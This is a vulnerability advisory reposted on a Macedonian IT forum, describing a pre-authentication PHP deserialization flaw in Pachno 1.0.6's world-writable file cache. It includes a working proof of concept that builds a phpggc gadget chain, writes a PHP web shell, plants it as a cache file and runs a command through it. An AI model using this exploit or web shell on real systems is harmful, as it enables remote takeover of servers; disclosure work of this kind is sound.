Стани премиум член и добиј попуст на 2000+ производи и куп други бенефити!
  • Ако имаш проблем со најава или регистрација на IT.mk, побарај го решението тука!

Pachno 1.0.6 FileCache Deserialization Remote Code Execution

zeroscience

ZSL Bot v4.89.1.00
31 мај 2010
1.091
660
www.zeroscience.mk
Код:
Pachno 1.0.6 FileCache Deserialization Remote Code Execution


Vendor: Daniel André Eikeland
Product web page: https://github.com/pachno/pachno
Affected version: 1.0.6

Summary: Pachno is an open-source collaboration platform (formerly known as The Bug
Genie) designed for team project management, issue tracking, and documentation. It
offers a module-based, customizable environment for software development and team
workflows, distributed under the Mozilla Public License.

Desc: The application uses unserialize() function on the contents of cache files
stored under {PACHNO_PATH}/cache/ during the framework bootstrap sequence, before
any authentication, routing, or controller logic is executed. Cache files are created
with world-writable permissions (chmod 0666) and use deterministic, predictable
filenames derived from a small set of constants. An attacker who can write to the
cache directory can inject a serialized PHP object payload that triggers arbitrary
code execution on the next HTTP request.

Tested on: GNU/Linux
           Apache2
           PHP/7.4
           MySQL/5.7 (MariaDB)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2026-5986
Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5986


06.04.2026

--


# ./phpggc SwiftMailer/FW1 /var/www/html/public/cmd.php '<?php system($_GET["c"]); ?>' -s > chaka.bin
# sleep 1
...
...
$ cp chaka.bin /var/www/html/cache/_configuration-2142a.cache
$ sleep 17
$ curl "https://127.0.0.1/cmd.php?c=whoami"
www-data



 

Последни теми

Последни огласи

ит маркет

На врв Дно